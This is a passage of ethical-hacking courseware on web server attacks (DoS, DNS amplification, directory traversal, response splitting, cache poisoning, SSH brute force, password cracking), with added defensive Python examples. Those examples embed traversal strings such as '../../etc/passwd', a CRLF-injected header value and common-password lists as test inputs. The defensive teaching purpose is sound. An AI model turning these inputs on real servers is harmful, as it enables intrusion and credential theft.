- Run regular risk queries to identify vulnerable firewall rules.
- Monitor user access to firewalls and control who can modify the firewall configuration.
- Specify the source and destination IP addresses as well as the ports.
- Notify the security policy administrator about firewall changes and document them.
- Control physical access to the firewall.
- Take regular backups of the firewall rule set and configuration files.
- Schedule regular firewall security audits.
Module Summary
This module discussed different IDS, IPS, firewall, and honeypot concepts and solutions. It also described various techniques for bypassing IDS and firewalls. In addition, it illustrated various IDS/firewall evasion tools. Further, it explained how to detect and defeat honeypots. Finally, it ended with a detailed discussion of various countermeasures to be adopted to prevent IDS/firewall evasion attempts by threat actors.
In the next module, we will discuss in detail how attackers as well as ethical hackers and pen-testers perform web server hacking to gain valuable information such as credit card numbers and passwords.
Module 13: Hacking Web Servers
Module Objectives
Most organizations consider their web presence to be an extension of themselves. Organizations maintain websites associated with their business on the World Wide Web to establish their web presence. Web servers are a critical component of web infrastructure. A single vulnerability in web server configuration may lead to a security breach on websites. Therefore, web server security is critical to the normal functioning of an organization.
This module starts with an overview of web server concepts. Subsequently, it provides insight into various web-server attacks, attack methodologies, and attack tools. Later, the module describes countermeasures against web server attacks, patch management, and security tools.
At the end of this module, you will be able to do the following:
- Describe web server concepts
- Perform various web server attacks
- Describe web server attack methodology
- Use different web server attack tools
- Apply web server attack countermeasures
- Describe patch management concepts
- Use different web server security tools
Web Server Operations
A web server is a computer system that stores, processes, and delivers web pages to clients via HTTP.
Figure 13.1: Typical client-server communication in web server operation
Components of a Web Server
A web server consists of the following components:
- Document Root: The document root is one of the root file directories of the web server that stores critical HTML files related to the web pages of a domain name, which will be sent in response to requests. For example, if the requested URL is www.certifiedhacker.com and the document root is stored in the directory named "certroot" under /admin/web, then /admin/web/certroot is the document directory address. If the complete request is www.certifiedhacker.com/P-folio/index.html, the server will search for the file path /admin/web/certroot/P-folio/index.html.
- Server Root: It is the top-level root directory under the directory tree in which the server's configuration and error, executable, and log files are stored. It consists of the code that implements the server. The server root, in general, consists of four files. One file is dedicated to the code that implements the server, while the other three are subdirectories, namely, -conf, -logs, and -cgi-bin, which are used for configuration information, logs, and executables, respectively.
- Virtual Document Tree: A virtual document tree provides storage on a different machine or disk after the original disk becomes full. It is case-sensitive and can be used to provide object-level security. In the above example under document root, for a request of www.certifiedhacker.com/P-folio/index.html, the server can also search for the file path /admin/web/certroot/P-folio/index.html if the directory admin/web/certroot is stored in another disk.
- Virtual Hosting: It is a technique of hosting multiple domains or websites on the same server. This technique allows sharing of resources among various servers. It is employed in large-scale companies, in which company resources are intended to be accessed and managed globally. The following are the types of virtual hosting:
  - Name-based hosting
  - Internet Protocol (IP)-based hosting
  - Port-based hosting
- Web Proxy: A proxy server is located between the web client and web server. Owing to the placement of web proxies, all requests from clients are passed on to the web server through the web proxies. They are used to prevent IP blocking and maintain anonymity.
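The document-root mapping described above (www.certifiedhacker.com/P-folio/index.html to /admin/web/certroot/P-folio/index.html) is also where a server must keep requests from climbing out of that root. The following added example, which is not part of the EC-Council courseware, implements that mapping with a lexical containment check; the resolver, its index-file default and its rejection behaviour are this example's own assumptions, only the paths come from the text.

```python
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import unquote, urlsplit

# Document root from the text's example (directory "certroot" under /admin/web).
DOCUMENT_ROOT = PurePosixPath("/admin/web/certroot")
INDEX_FILE = "index.html"                       # served for directory requests


def resolve_request(url: str, doc_root: PurePosixPath = DOCUMENT_ROOT) -> Optional[PurePosixPath]:
    """
    Map a request URL onto a file path under doc_root, purely lexically (no
    filesystem access). Returns None when the normalized path would climb out
    of the document root, which is the containment check that defeats
    directory-traversal requests built from '..' segments.
    """
    path = unquote(urlsplit(url).path) or "/"   # decode %2E%2E etc. before checking
    if path.endswith("/"):
        path += INDEX_FILE
    parts = []
    for seg in PurePosixPath(path).parts:
        if seg in ("/", "."):
            continue
        if seg == "..":
            if not parts:
                return None                     # attempt to climb above the root
            parts.pop()
        else:
            parts.append(seg)
    if not parts:
        parts = [INDEX_FILE]
    candidate = doc_root.joinpath(*parts)
    # Defensive re-check: the joined path must still lie inside doc_root.
    if doc_root not in candidate.parents:
        return None
    return candidate


if __name__ == "__main__":
    for u in ("http://www.certifiedhacker.com/P-folio/index.html",
              "http://www.certifiedhacker.com/",
              "http://www.certifiedhacker.com/P-folio/../../../outside/secret.txt"):
        print(f"{u} -> {resolve_request(u)}")
```

A production server would additionally resolve symlinks on the filesystem and re-check containment on the real path, since a symlink inside the root can point outside it.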
Open-source Web Server Architecture
Open-source web server architecture typically uses Linux, Apache, MySQL, and PHP, often called the LAMP software bundle, as the principal components.
The following are the functions of the principal components in open-source web server architecture:
- Linux is the operating system (OS) of the web server and provides a secure platform
- Apache is the component of the web server that handles each HTTP request and response
- MySQL is a relational database used to store the content and configuration information of the web server
- PHP is the application layer technology used to generate dynamic web content
IIS Web Server Architecture
It has several components, including a protocol listener such as HTTP.sys and services such as the World Wide Web Publishing Service (WWW Service) and Windows Process Activation Service (WAS). Each component functions in application and web server roles. These functions may include listening to requests, managing processes, and reading configuration files.
Web Server Security Issues
Figure 13.4: Conceptual diagram of a web server: the user visits websites hosted on a web server
Organizations can defend most network-level and OS-level attacks by adopting network security measures such as firewalls, intrusion detection systems (IDSs), and intrusion prevention systems (IPSs) and by following security standards and guidelines. This forces attackers to turn their attention to web-server- and web-application-level attacks because a web server that hosts web applications is accessible from anywhere over the Internet. This makes web servers an attractive target. Poorly configured web servers can create vulnerabilities in even the most carefully designed firewall systems. Attackers can exploit poorly configured web servers with known vulnerabilities to compromise the security of web applications. Furthermore, web servers with known vulnerabilities can harm the security of an organization. As shown in the below figure, organizational security includes seven levels from stack 1 to stack 7.
Figure 13.5: Levels of organizational security
Common Goals behind Web Server Hacking
Attackers perform web server attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach the security of a web server and steal sensitive information for financial gains or merely for the sake of curiosity.
The following are some common goals of web server attacks:
- Stealing credit-card details or other sensitive credentials using phishing techniques
- Integrating the server into a botnet to perform denial of service (DoS) or distributed DoS (DDoS) attacks
- Compromising a database
- Obtaining closed-source applications
- Hiding and redirecting traffic
- Escalating privileges
Some attacks are performed for personal reasons, rather than financial gains:
- For pure curiosity
- For completing a self-set intellectual challenge
- For damaging the target organization's reputation
Dangerous Security Flaws Affecting Web Server Security
A web server configured by poorly trained system administrators may have security vulnerabilities. Inadequate knowledge, negligence, laziness, and inattentiveness toward security can pose the greatest threats to web server security.
The following are some common oversights that make a web server vulnerable to attacks:
- Failing to update the web server with the latest patches
- Using the same system administrator credentials everywhere
- Allowing unrestricted internal and outbound traffic
- Running unhardened servers and applications
Impact of Web Server Attacks
Why are Web Servers Compromised?
The following are some oversights that can compromise a web server:
- Improper file and directory permissions
- Installing the server with default settings
- Unnecessary services enabled, including content management and remote administration
- Security conflicts with the business' ease-of-use requirements
- Lack of proper security policy, procedures, and maintenance
- Improper authentication with external systems
- Default accounts with default or no passwords
- Unnecessary default, backup, or sample files
- Misconfigurations in the web server, OS, and networks
- Bugs in server software, OS, and web applications
- Misconfigured Secure Sockets Layer (SSL) certificates and encryption settings
- Administrative or debugging functions that are enabled or accessible on web servers
- Use of self-signed certificates and default certificates
Module Flow: Web Server Concepts; Web Server Attacks; Web Server Attack Methodology; Countermeasures; Patch Management; Web Server Security Tools
Web Server Attacks

An attacker can use many techniques to compromise a web server, such as DoS/DDoS, Domain Name System (DNS) server hijacking, DNS amplification, directory traversal, man in the middle (MITM)/sniffing, phishing, website defacement, web server misconfiguration, HTTP response splitting, web cache poisoning, Secure Shell (SSH) brute force, and web server password cracking. This section describes these attack techniques in detail.
DoS/DDoS Attacks

Attackers may send numerous fake requests to the web server, which causes web server crashing or makes it unavailable to legitimate users. Attackers may target high-profile servers such as banks, card payment gateways, and government services to steal user credentials.

A DoS/DDoS attack involves flooding targets with copious fake requests so that the target stops functioning and becomes unavailable to legitimate users. By using a web server DoS/DDoS attack, an attacker attempts to take the web server down or make it unavailable to legitimate users. A web server DoS/DDoS attack often targets high-profile web servers such as bank servers, credit-card payment gateways, and even root name servers. Such attacks may exhaust resources including the following:
- Memory
- Application exception-handling mechanism
- Hard-disk space
- Database space
DNS Server Hijacking

The Domain Name System (DNS) resolves a domain name to its corresponding IP address. A user queries the DNS server with a domain name, and the DNS server responds with the corresponding IP address. In DNS server hijacking, an attacker compromises a DNS server and changes its mapping settings to redirect toward a rogue DNS server that would redirect the user's requests to the attacker's rogue server. Consequently, when the user enters a legitimate URL in a browser, the settings will redirect to the attacker's fake site.

Figure 13.7: DNS server hijacking
DNS Amplification Attack

An attacker takes advantage of the DNS recursive method of DNS redirection to perform DNS amplification attacks. The attacker uses compromised PCs with spoofed IP addresses to amplify the DDoS attack on the victim's DNS server.

Recursive DNS query is a method of requesting DNS mapping. The query goes through DNS servers recursively until it fails to find the specified domain name to IP address mapping.
The following are the steps involved in processing recursive DNS requests; these steps are illustrated in the below figure.
- Step 1: Users who desire to resolve a domain name to its corresponding IP address send a DNS query to the primary DNS server specified in its Transmission Control Protocol (TCP)/IP properties.
- Steps 2 to 7: If the requested DNS mapping does not exist on the user's primary DNS server, the server forwards the request to the root server. The root server forwards the request to the .com namespace, where the user can find DNS mappings. This process repeats recursively until the DNS mapping is resolved.
- Step 8:

Figure 13.8: Recursive DNS query
- Step 2: All the compromised hosts spoof the victim's IP address and send DNS query requests to the primary DNS server configured in the victim's TCP/IP settings.
- Steps 3 to 8: If the requested DNS mapping does not exist on the victim's primary DNS server, the server forwards the requests to the root server. The root server forwards the request to the .com or respective top-level domain (TLD) namespaces. This process repeats recursively until the victim's primary DNS server resolves the DNS mapping request.
- Step 9: After the primary DNS server finds the DNS mapping for the victim's request, it sends a DNS mapping response to the victim's IP address. This response goes to the victim because bots use the victim's IP address. The replies to copious DNS mapping requests from the bots result in DDoS on the victim's DNS server.

Figure 13.9: DNS amplification attack
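As an added example that is not part of the courseware, the following Python script shows how a resolver operator could spot the pattern of steps 2 to 9 in its own logs: the spoofed source address appears as the client of many small queries and receives many large answers. The log format, field names and thresholds are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed resolver log lines (not real traffic). Assumed format:
# <time> <query|response> client=<ip> qname=<name> qtype=<type> bytes=<n>
SAMPLE_LOG = """\
10:00:01 query client=203.0.113.5 qname=example.com qtype=ANY bytes=64
10:00:01 response client=203.0.113.5 qname=example.com qtype=ANY bytes=3200
10:00:01 query client=203.0.113.5 qname=example.com qtype=ANY bytes=64
10:00:01 response client=203.0.113.5 qname=example.com qtype=ANY bytes=3200
10:00:02 query client=203.0.113.5 qname=example.com qtype=ANY bytes=64
10:00:02 response client=203.0.113.5 qname=example.com qtype=ANY bytes=3200
10:00:02 query client=198.51.100.7 qname=www.example.com qtype=A bytes=60
10:00:02 response client=198.51.100.7 qname=www.example.com qtype=A bytes=76
"""

LINE_RE = re.compile(
    r"^(?P<time>\S+) (?P<dir>query|response) client=(?P<client>\S+) "
    r"qname=(?P<qname>\S+) qtype=(?P<qtype>\S+) bytes=(?P<bytes>\d+)$"
)


def parse_log(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["bytes"] = int(rec["bytes"])
            yield rec


def amplification_stats(records):
    """Per client IP: number of queries, bytes queried and bytes answered."""
    stats = defaultdict(lambda: {"queries": 0, "query_bytes": 0, "response_bytes": 0})
    for r in records:
        s = stats[r["client"]]
        if r["dir"] == "query":
            s["queries"] += 1
            s["query_bytes"] += r["bytes"]
        else:
            s["response_bytes"] += r["bytes"]
    return dict(stats)


def suspected_victims(stats, min_queries=3, min_ratio=10.0):
    """Client IPs whose answered/queried byte ratio and query count both exceed
    the thresholds. In a reflection attack the 'client' is the spoofed victim
    (step 2), so the resolver is the one sending it the large answers (step 9)."""
    flagged = {}
    for ip, s in stats.items():
        if s["queries"] < min_queries or s["query_bytes"] == 0:
            continue
        ratio = s["response_bytes"] / s["query_bytes"]
        if ratio >= min_ratio:
            flagged[ip] = round(ratio, 1)
    return flagged


if __name__ == "__main__":
    print(suspected_victims(amplification_stats(parse_log(SAMPLE_LOG))))
```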
Directory Traversal Attacks
An attacker may be able to perform a directory traversal attack owing to a vulnerability in the code of a web application. In addition, poorly patched or configured web server software can make the web server vulnerable to a directory traversal attack.

The design of web servers limits public access to some extent. Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside the web server's root directory by manipulating a Uniform Resource Locator (URL). In directory traversal attacks, attackers use the dot-dot-slash (../) sequence to access restricted directories outside the web server's root directory. Attackers can use the trial-and-error method to navigate outside the root directory and access sensitive information in the system.

An attacker exploits the web server software (web server program) to perform directory traversal attacks. The attacker usually performs this attack with the help of a browser. A web server is vulnerable to this attack if it accepts input data from a browser without proper validation.

Figure 13.10: Directory traversal attack
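The validation step the text says a vulnerable server lacks, as an added example that is not from the courseware: a Python function that maps a requested URL path onto the filesystem and refuses anything that resolves outside the web root, including percent-encoded and double-encoded dot-dot-slash sequences. The web root path used is a placeholder.

```python
import os
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would escape the web root."""


def resolve_under_root(web_root, requested_path):
    """Map a URL path onto a filesystem path confined to web_root.

    Percent-decoding is repeated (bounded) so that %2e%2e%2f and double-encoded
    %252e%252e%252f cannot slip past a check done on the raw string. The decision
    is made on the normalized absolute path, not on the text of the request."""
    decoded = requested_path
    for _ in range(3):                      # bounded loop: no endless decoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    decoded = decoded.replace("\\", "/")    # treat Windows-style ..\ the same way
    root = os.path.realpath(web_root)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # Allowed only if the candidate is the root itself or lies beneath it.
    if candidate != root and not candidate.startswith(root + os.sep):
        raise TraversalError(f"path escapes web root: {requested_path!r}")
    return candidate


def is_safe(web_root, requested_path):
    """Convenience wrapper returning True/False instead of raising."""
    try:
        resolve_under_root(web_root, requested_path)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # "/srv/site" is a placeholder web root for this example.
    for p in ["/index.html", "../../etc/passwd", "/%2e%2e/%2e%2e/etc/passwd"]:
        print(p, "->", "allowed" if is_safe("/srv/site", p) else "rejected")
```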
Man-in-the-Middle/Sniffing Attack

Man-in-the-middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end user and web servers. In an MITM attack or sniffing attack, an intruder intercepts or modifies the messages exchanged between the user and web server by eavesdropping or intruding into a connection. This allows an attacker to steal sensitive user information, such as online banking details, usernames, and passwords, transferred over the Internet to the web server. The attacker lures the victim to connect to the web server by pretending to be a proxy. If the victim believes and accepts the attacker's request, then all the communication between the user and web server passes through the attacker. In this manner, the attacker can steal sensitive user information.

Figure 13.11: Man-in-the-middle/sniffing attack
Phishing Attacks

Attackers perform a phishing attack by sending an email containing a malicious link and tricking the user into clicking it. Clicking the link will redirect the user to a fake website that appears similar to the legitimate website. Attackers create such websites by hosting their address on web servers. When a victim clicks on the malicious web link while believing the link to be a legitimate website address, the victim is redirected to the malicious website hosted on the attacker's server. The website prompts the user to enter sensitive information, such as usernames, passwords, bank account details, and social security numbers, and divulges the data to the attacker. Later, the attacker may be able to establish a session with the legitimate website by using the victim's stolen credentials to perform malicious operations on the target legitimate website.

Figure 13.12: Phishing attacks
Website Defacement

Website defacement refers to unauthorized changes made to the content of a single web page or an entire website, resulting in changes to the visual appearance of the web page or website. Hackers break into web servers and alter the hosted website by injecting code to add images, popups, or text to a page in such a manner that the visual appearance of the page changes. In some cases, the attacker may replace the entire website instead of just changing a single page.

Figure 13.12: Screenshot displaying a website defacement attack

Defaced pages expose visitors to propaganda or misleading information until the unauthorized changes are discovered and corrected. Attackers use a variety of methods, such as MySQL injection, to access a website to deface it. In addition to changing the visual appearance of the target website, attackers deface websites for infecting the computers of visitors by making the website vulnerable to virus attacks. Thus, website defacement not only embarrasses the target organization by changing the appearance of its website but is also intended to harm its visitors.
Web Server Misconfiguration
Web server misconfiguration refers to the configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers, such as directory traversal, server intrusion, and data theft. The following are some web server misconfigurations:
- Verbose debug/error messages
- Anonymous or default users/passwords
- Sample configuration and script files
- Remote administration functions
- Unnecessary services enabled
- Misconfigured/default SSL certificates

An Example of a Web Server Misconfiguration

"Keeping the server configuration secure requires vigilance", Open Web Application Security Project (OWASP)

Administrators who configure web servers improperly may leave serious loopholes in the web server, thereby providing an attacker the chance to exploit the misconfigured web server to compromise its security and obtain sensitive information. The vulnerabilities of improperly configured web servers may be related to configuration, applications, files, scripts, or web pages. An attacker searches for such vulnerable web servers to launch attacks. The misconfiguration of a web server provides the attacker a path to enter the target network of an organization. These loopholes in the server can also help an attacker bypass user authentication. Once detected, these problems can be easily exploited and may result in the total compromise of a website hosted on the target web server. As shown in the below figure, the configuration may allow anyone to view the server status page, which contains detailed information about the current use of the web server, including information about the current hosts and requests being processed.

Figure 13.14: Screenshot displaying the httpd.conf file on an Apache server

As shown in the below figure, the configuration may give verbose error messages.

    display_error = on
    log_errors = On
    error_log = syslog

Figure 13.15: Screenshot displaying the php.ini file
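An added example, not from the courseware, of auditing the php.ini settings shown in Figure 13.15 before deployment: the script parses php.ini-style text and reports every directive that differs from a production expectation, treating a missing directive as a finding rather than assuming it is safe. The expected values and the two sample fragments are assumptions made for this example (the real directive is display_errors; the screenshot's spelling is not used).

```python
import re

# Constructed php.ini fragment reproducing the weak settings of Figure 13.15.
WEAK_PHP_INI = """\
; constructed sample, not a real server's file
display_errors = On
log_errors = On
error_log = syslog
"""

# Constructed fragment with the settings a production server should carry.
HARDENED_PHP_INI = """\
display_errors = Off
display_startup_errors = Off
log_errors = On
error_log = syslog
expose_php = Off
"""

_DIRECTIVE = re.compile(r"^\s*([A-Za-z_.]+)\s*=\s*(.*?)\s*$")


def parse_ini(text):
    """Return {directive: value}, ignoring blank lines and ';' or '#' comments.
    Values are lower-cased so On/on/ON compare equal, as PHP treats them."""
    settings = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip()[0] in ";#":
            continue
        m = _DIRECTIVE.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2).strip('"').lower()
    return settings


# Assumed production policy for this example: directive -> required value.
EXPECTED = {
    "display_errors": "off",          # verbose errors go to the log, not the browser
    "display_startup_errors": "off",
    "log_errors": "on",               # keep the diagnostics, just not for visitors
    "expose_php": "off",              # no X-Powered-By version banner
}


def audit_php_ini(text):
    """List findings as (directive, actual, expected). A directive that is not
    set at all is reported with actual=None so it is never silently accepted."""
    settings = parse_ini(text)
    findings = []
    for directive, wanted in EXPECTED.items():
        actual = settings.get(directive)
        if actual != wanted:
            findings.append((directive, actual, wanted))
    return findings


if __name__ == "__main__":
    for name, text in [("weak", WEAK_PHP_INI), ("hardened", HARDENED_PHP_INI)]:
        print(name, audit_php_ini(text))
```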
HTTP Response-Splitting Attack

An HTTP response-splitting attack is a web-based attack in which the attacker tricks the server by injecting new lines into response headers, along with arbitrary code. It involves adding header response data into the input field so that the server splits the response into two responses. This type of attack exploits vulnerabilities in input validation. Cross-site scripting (XSS), cross-site request forgery (CSRF), and Structured Query Language (SQL) injection are examples of this type of attack. In this attack, the attacker controls the input parameter and cleverly constructs a request header that elicits two responses from the server. The attacker alters a single request to appear as two requests by adding header response data into the input field. The web server, in turn, responds to each request. The attacker can pass malicious data to a vulnerable application, and the application includes the data in an HTTP response header. The attacker can control the first response to redirect the user to a malicious website, whereas the web browser will discard other responses.

Figure 13.16: HTTP response-splitting attack (vulnerable cookie-setting code that reads request.getParameter(AUTHOR_PARAM) and calls cookie.setMaxAge(cookieExpiration))

Example of an HTTP Response-Splitting Attack

In this example, the attacker sends a response-splitting request to the web server. The server splits the response into two and sends the first response to the attacker and the second response to the victim. After receiving the response from the web server, the victim requests service by providing credentials. Simultaneously, the attacker requests the index page. Subsequently, the web server sends the response to the victim's request to the attacker, and the victim remains uninformed.

Figure 13.17: Example of an HTTP response-splitting attack
Web Cache Poisoning Attack

Web cache poisoning damages the reliability of an intermediate web cache source. In this attack, an attacker swaps cached content for a random URL with infected content. Users of the web cache source may unknowingly use the poisoned content instead of the true and secured content when requesting the required URL through the web cache.

An attacker forces the web server's cache to flush its actual cache content and sends a specially crafted request to store in the cache. In this case, all the users of that web server cache will receive malicious content until the servers flush the web cache. Web cache poisoning attacks are possible if the web server and application have HTTP response-splitting flaws.

Figure 13.18: Web cache poisoning attack
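One added example, not from the courseware, serving both the response-splitting section and this one (cache poisoning needs the same flaw): the cookie-setting pattern of Figure 13.16 written in Python beside a hardened version that rejects control characters in header values, plus a counter that shows how many status lines a cache or proxy would parse out of the resulting bytes. The parameter value and response body are constructed for the example.

```python
import re

CRLF = "\r\n"


def build_response_vulnerable(author):
    """Same flaw as Figure 13.16: the request parameter lands in a Set-Cookie
    header unvalidated, so CR/LF inside it terminates the header block."""
    headers = ["HTTP/1.1 200 OK",
               "Set-Cookie: author=" + author,
               "Content-Type: text/html"]
    return CRLF.join(headers) + CRLF + CRLF + "<html>welcome</html>"


# A header field value may not contain CR, LF or other control characters.
_FORBIDDEN = re.compile(r"[\x00-\x1f\x7f]")


class HeaderInjection(ValueError):
    pass


def safe_header_value(value):
    """Reject any value that could end the header line or the header block."""
    if _FORBIDDEN.search(value):
        raise HeaderInjection("control character in header value")
    return value


def build_response_hardened(author):
    headers = ["HTTP/1.1 200 OK",
               "Set-Cookie: author=" + safe_header_value(author),
               "Content-Type: text/html"]
    return CRLF.join(headers) + CRLF + CRLF + "<html>welcome</html>"


def count_responses(raw):
    """Number of 'HTTP/1.x <status>' lines a proxy or shared cache would parse.
    2 means the response was split; the second one is what a cache could store
    under whatever URL it believes is being answered next."""
    return len(re.findall(r"(?m)^HTTP/1\.[01] \d{3}", raw))


def rejects(value):
    """True if the hardened builder refuses the value."""
    try:
        build_response_hardened(value)
        return False
    except HeaderInjection:
        return True


# Constructed parameter value carrying CRLFs and a second, attacker-written response.
INJECTED = ("Wiley" + CRLF + "Content-Length: 0" + CRLF + CRLF +
            "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF + CRLF +
            "<html>attacker content</html>")

if __name__ == "__main__":
    print("vulnerable:", count_responses(build_response_vulnerable(INJECTED)), "responses")
    print("hardened rejects injected value:", rejects(INJECTED))
```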
SSH Brute Force Attack

Attackers use SSH protocols to create an encrypted SSH tunnel between two hosts to transfer unencrypted data over an insecure network. Usually, SSH runs on TCP port 22. To perform an attack on SSH, an attacker scans the entire SSH server using bots (performs a port scan on TCP port 22) to identify possible vulnerabilities. With the help of a brute-force attack, the attacker obtains login credentials to gain unauthorized access to an SSH tunnel. An attacker who obtains the login credentials of SSH can use the same SSH tunnels to transmit malware and other means of exploitation to victims without being detected. Attackers use tools such as Nmap and Ncrack on a Linux platform to perform an SSH brute-force attack.

Figure 13.19: SSH brute force attack
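How the attack above looks from the server side, as an added example that is not from the courseware: a Python script parses sshd failed-password lines in the usual syslog shape and flags any source address with a burst of failures in a short window, listing the usernames tried. The log lines are constructed, and the year, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in syslog auth.log shape (not real traffic).
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web1 sshd[2101]: Failed password for root from 203.0.113.9 port 51001 ssh2
Mar  3 10:15:02 web1 sshd[2102]: Failed password for root from 203.0.113.9 port 51002 ssh2
Mar  3 10:15:02 web1 sshd[2103]: Failed password for invalid user admin from 203.0.113.9 port 51003 ssh2
Mar  3 10:15:03 web1 sshd[2104]: Failed password for invalid user test from 203.0.113.9 port 51004 ssh2
Mar  3 10:15:04 web1 sshd[2105]: Failed password for invalid user guest from 203.0.113.9 port 51005 ssh2
Mar  3 10:15:05 web1 sshd[2106]: Accepted publickey for deploy from 198.51.100.20 port 40022 ssh2
Mar  3 10:20:30 web1 sshd[2107]: Failed password for alice from 198.51.100.20 port 40023 ssh2
Mar  3 10:40:31 web1 sshd[2108]: Failed password for alice from 198.51.100.20 port 40024 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(text, year=2020):
    """Return (timestamp, user, source_ip) for each failed-password line.
    syslog timestamps carry no year, so one is supplied (assumption)."""
    out = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            out.append((ts, m["user"], m["ip"]))
    return out


def brute_force_sources(failures, threshold=5, window=timedelta(minutes=1)):
    """Source IPs with at least `threshold` failures inside any sliding window.
    The distinct usernames tried are returned: many names from one address is
    the signature of a dictionary or brute-force run rather than a typo."""
    by_ip = defaultdict(list)
    for ts, user, ip in failures:
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = sorted({u for _, u in events})
                break
    return flagged


if __name__ == "__main__":
    print(brute_force_sources(parse_failures(SAMPLE_AUTH_LOG)))
```

Two failures twenty minutes apart from 198.51.100.20 stay below the threshold, so only the burst source is reported.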
Web Server Password Cracking

An attacker attempts to exploit weaknesses to hack well-chosen passwords. The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, and so on. The attacker mainly targets the following through web server password cracking:
- SMTP and FTP servers
- Web shares
- SSH tunnels
- Web form authentication

Attackers use different methods such as social engineering, spoofing, phishing, a Trojan horse or virus, wiretapping, and keystroke logging to perform web server password cracking. In many hacking attempts, the attacker starts with password cracking to prove to the web server that they are a valid user.

Web Server Password Cracking Techniques

Password cracking is the most common method of gaining unauthorized access to a web server by exploiting flawed and weak authentication mechanisms. Once the password is cracked, an attacker can use the password to launch further attacks. We present some details of various tools and techniques used by attackers to crack passwords. Attackers can use password cracking techniques to extract passwords from web servers, FTP servers, SMTP servers, and so on. They can crack passwords either manually or with automated tools such as THC Hydra, Ncrack, and RainbowCrack.
The following are some techniques attackers use to crack passwords:
- Guessing: This is the most common method of cracking passwords. In this method, the attacker guesses possible passwords either manually or by using automated tools provided with dictionaries. Most people tend to use their pets' names, loved ones' names, license plate numbers, dates of birth, or other weak passwords such as "QWERTY," "admin," "password," etc. so that they can remember them easily. The attacker exploits this human behavior to crack passwords.
- Dictionary attack: A dictionary attack uses a predefined file containing various combinations of words, and an automated program enters these words one at a time to check if any of them are the password. This might not be effective if the password includes special characters and symbols. If the password is a simple word, then it can be found quickly. Compared to a brute-force attack, a dictionary attack is less time consuming.
- Brute-force attack: In the brute-force method, all possible character combinations are tested; for example, the test may include combinations of uppercase characters from A to Z, numbers from 0 to 9, and lowercase characters from a to z. This method is useful for identifying one-word or two-word passwords. If a password consists of uppercase and lowercase letters as well as special characters, it might take months or years to crack the password using a brute-force attack.
- Hybrid attack: A hybrid attack is more powerful than the above techniques because it uses both a dictionary attack and brute-force attack. It also uses symbols and numbers. Password cracking is easier with this method than with the above methods.
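The four techniques turned into an acceptance check for new passwords, as an added example that is not from the courseware: a candidate is rejected if it is one of the common passwords the section lists (guessing), a dictionary word, a dictionary word padded with digits or symbols (hybrid), or has too small a brute-force keyspace for its character classes. The word list, the 60-bit threshold and the symbol count are assumptions for this example.

```python
import math
import re

# The common passwords named in the text, used as the guessing list.
COMMON_PASSWORDS = {"password", "root", "administrator", "admin", "demo",
                    "test", "guest", "qwerty"}
# Constructed stand-in for an attacker's dictionary (pet names etc.).
DICTIONARY = COMMON_PASSWORDS | {"buddy", "max", "bella", "charlie", "summer"}


def charset_size(pw):
    """Size of the alphabet an exhaustive (brute-force) search must cover."""
    size = 0
    if re.search(r"[a-z]", pw):
        size += 26
    if re.search(r"[A-Z]", pw):
        size += 26
    if re.search(r"[0-9]", pw):
        size += 10
    if re.search(r"[^A-Za-z0-9]", pw):
        size += 33          # printable ASCII punctuation (assumed alphabet)
    return size


def brute_force_bits(pw):
    """log2 of the keyspace the brute-force method described above would search."""
    return len(pw) * math.log2(charset_size(pw)) if pw else 0.0


def hybrid_stem(pw):
    """Strip leading/trailing digits and symbols, e.g. 'Buddy2019!' -> 'buddy',
    which is what a hybrid attack appends to dictionary words."""
    return re.sub(r"^[^A-Za-z]+|[^A-Za-z]+$", "", pw).lower()


def assess(pw, min_bits=60.0):
    """Return (accepted, reason) in the order of the techniques in the text:
    guessing, dictionary, hybrid, then brute force."""
    low = pw.lower()
    if low in COMMON_PASSWORDS:
        return False, "guessable: in the common-password list"
    if low in DICTIONARY:
        return False, "dictionary word"
    if hybrid_stem(pw) in DICTIONARY:
        return False, "dictionary word with digits/symbols (hybrid attack)"
    bits = brute_force_bits(pw)
    if bits < min_bits:
        return False, f"brute-forceable: keyspace ~2^{bits:.0f}"
    return True, f"ok: keyspace ~2^{bits:.0f}"


if __name__ == "__main__":
    for candidate in ["password", "Bella", "Buddy2019!", "abcdefg", "Tr0ub4dor&3"]:
        print(candidate, assess(candidate))
```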
Server-Side Request Forgery (SSRF) Attack

Attackers exploit SSRF vulnerabilities in a public web server to send crafted requests to the internal or back-end servers.

Figure 13.20: Demonstration of SSRF attack (attacker, firewall, web application, and database server)
Web Application Attacks

Vulnerabilities in web applications running on a web server provide a broad attack path for compromising the web server. Web application attacks include Parameter/Form Tampering, Cookie Tampering, Unvalidated Input and File Injection, Session Hijacking, SQL Injection, Directory Traversal, Denial of Service (DoS), Cross-Site Scripting (XSS), and Buffer Overflow attacks.

